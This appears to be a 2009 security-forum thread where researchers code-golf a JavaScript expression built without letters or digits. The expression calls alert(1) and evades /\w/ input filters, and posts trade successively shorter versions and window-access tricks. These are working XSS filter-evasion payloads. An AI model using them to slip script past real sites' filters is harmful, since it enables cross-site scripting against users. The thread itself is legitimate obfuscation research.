(µ=[µ=[]][(ø=!µ+µ)[ª=-~-~-~µ]+({}+µ)[ª/ª]+(æ=(µª=!!ª+µ)[ª/ª]+µª[+µ])])()[ø[ª/ª]+ø[ª+~µ]+µª[ª]+æ](ª/ª)

101... and no quotes :) and works in Firebug (like anyone would care *g*)



Edited 4 time(s). Last edit at 06/04/2009 05:23PM by .mario.

($=[$=[]][(µ=!$+$)[_=-~-~-~$]+({}+$)[Å=_/_]+(ª=(Ç=!''+$)[Å]+Ç[+$])])()[µ[Å]+µ[_+~$]+Ç[_]+ª](Å)

94

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 06/04/2009 08:44PM by Gareth Heyes.

this is an a: ª

wtf what is alnum now?

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

ok this then :P

($=[$=[]][(µ=!$+$)[_=-~-~-~$]+({}+$)[Å=_/_]+(º=(Ç=!''+$)[Å]+Ç[+$])])()[µ[Å]+µ[_+~$]+Ç[_]+º](Å)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

anyway, this bypasses the filter for /\w/

(É=[É=[]][(µ=!É+É)[È=-~-~-~É]+({}+É)[Å=È/È]+(ª=(Ç=!!È+É)[Å]+Ç[+É])])()[µ[Å]+µ[È+~É]+Ç[È]+ª](Å)

not even $.. god.. why so serious?

Greetz!!

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 2 time(s). Last edit at 06/04/2009 09:02PM by sirdarckcat.

x=[].reverse,x() === window

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

you people seriously worry me.. pretty soon I'm going to have to call shenanigans.. :)

--thrill

---

It is not the degrees you hold, but the mind you possess. - thrill

Really cool stuff !I love it!

(Although, as Swedish, I am a bit offended that Å does not count as an alphabetic letter... )

actually it does depending on the charset (on php), but here we are just sticking to a-zA-Z0-9

Greetz!!

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Got it down to 93 now

($=[$=[]][(µ=!$+$)[_=-~-~-~$]+({}+$)[Å=_/_]+(º=(Ç=!''+$)[Å]+Ç[+$])])()[µ[Å]+µ[Å+Å]+Ç[_]+º](Å)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Nuts. Just plain nuts.

-Matt

i love how inside each strings, the charaters required to get each letter decreases as you go along since you can reuse fragments gathered earlier

This was hard work:-

http://www.businessinfo.co.uk/labs/hackvertor/hackvertor.php#PEBoYXNlZ2F3YV8wKCKqwMHCw8TGyMnKy8zNzs%2FQ0dLT1NXW2Nna29zd3t%2Fg4eLj5OXm5%2Bjp6uvs7e7v8PHy8%2FT19vj5%2Bvv8%2Ff4kXyIpPmFsZXJ0KDEpPEAvaGFzZWdhd2FfMD4%3D

I've reduced the code to generate the code block rather than each letter and now it's possible to define your own variables.

I could randomise the number generation and expressions too, I might do it

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

91
(É=[Å=É=[]][(µ=!É+É)[È=++Å+Å+Å]+({}+É)[Å]+(ª=(Ç=!!È+É)[Å]+Ç[+É])])()[µ[Å]+µ[Å+Å]+Ç[È]+ª](Å)

------------------------

90
(É=[Å=[],µ=!Å+Å][µ[È=-~-~++Å]+({}+Å)[Ç=!!Å+µ,ª=Ç[Å]+Ç[+!Å],Å]+ª])()[µ[Å]+µ[Å+Å]+Ç[È]+ª](Å)

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 7 time(s). Last edit at 06/06/2009 12:05AM by sirdarckcat.

Just when you think this contest is over...there goes another byte

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

(Å=[],[µ=!Å+Å][µ[È=++Å+Å+Å]+({}+Å)[Ç=!!Å+µ,ª=Ç[Å]+Ç[+!Å],Å]+ª])()[µ[Å]+µ[Å+Å]+Ç[È]+ª](Å)

88!

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

wow, that's cool
([],[].sort)() == window

we dont need assignments anymore

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Do I win yet? :D

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

concat() also works:

({}=[].concat)()[0] == window

---------------------------------------------------------------------------------
[[url=http://voodoo-labs.org]Voodoo Research Group[/url]]
[[url=http://foro.undersecurity.net/]US.net forum[/url]]

Based on comments by sirdarckcat, I created a new folder for obfuscation tricks, because one long thread is just getting out of control, and I think you guys are onto bigger things than just XSS as well. Please post all future comments into this forum folder: http://sla.ckers.org/forum/list.php?24

- RSnake
Gotta love it. http://ha.ckers.org